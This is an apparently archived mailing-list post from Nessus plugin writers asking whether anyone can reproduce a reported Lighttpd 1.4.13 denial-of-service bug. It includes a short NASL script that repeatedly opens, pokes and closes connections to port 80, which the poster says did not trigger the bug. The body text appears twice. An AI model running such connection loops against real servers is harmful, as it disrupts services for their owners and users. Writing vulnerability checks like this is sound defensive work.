"Robert Jakabosky discovered an infinite loop triggered by a connection
abort when Lighttpd processes carriage return and line feed sequences."
Could anybody reproduce this DoS? I recompile a lighttpd 1.4.13, but
this script does not work.
The server rejects connections for about one minute (because
all ports are saturated with sockets in TIME_WAIT state), but it only
affects the attacking source IP and there is no CPU loop.
$ more /tmp/ec.nasl
i= 0;
while (s = open_sock_tcp(80))
{
i ++;
send(socket: s, data: 'GET / HTTP/1.0\r\n');
close(s);
}
display(i, ' done\n');
$
--
http://www.bigfoot.com/~arboi http://ma75.blogspot.com/
PGP key ID : 0x0BBABA91 - 0x1320924F0BBABA91
Fingerprint: 1048 B09B EEAF 20AA F645 2E1A 1320 924F 0BBA BA91
_______________________________________________
Plugins-writers mailing list
Plugins-writers@list.nessus.org
http://mail.nessus.org/mailman/listinfo/plugins-writers
abort when Lighttpd processes carriage return and line feed sequences."
Could anybody reproduce this DoS? I recompile a lighttpd 1.4.13, but
this script does not work.
The server rejects connections for about one minute (because
all ports are saturated with sockets in TIME_WAIT state), but it only
affects the attacking source IP and there is no CPU loop.
$ more /tmp/ec.nasl
i= 0;
while (s = open_sock_tcp(80))
{
i ++;
send(socket: s, data: 'GET / HTTP/1.0\r\n');
close(s);
}
display(i, ' done\n');
$
--
http://www.bigfoot.com/~arboi http://ma75.blogspot.com/
PGP key ID : 0x0BBABA91 - 0x1320924F0BBABA91
Fingerprint: 1048 B09B EEAF 20AA F645 2E1A 1320 924F 0BBA BA91
_______________________________________________
Plugins-writers mailing list
Plugins-writers@list.nessus.org
http://mail.nessus.org/mailman/listinfo/plugins-writers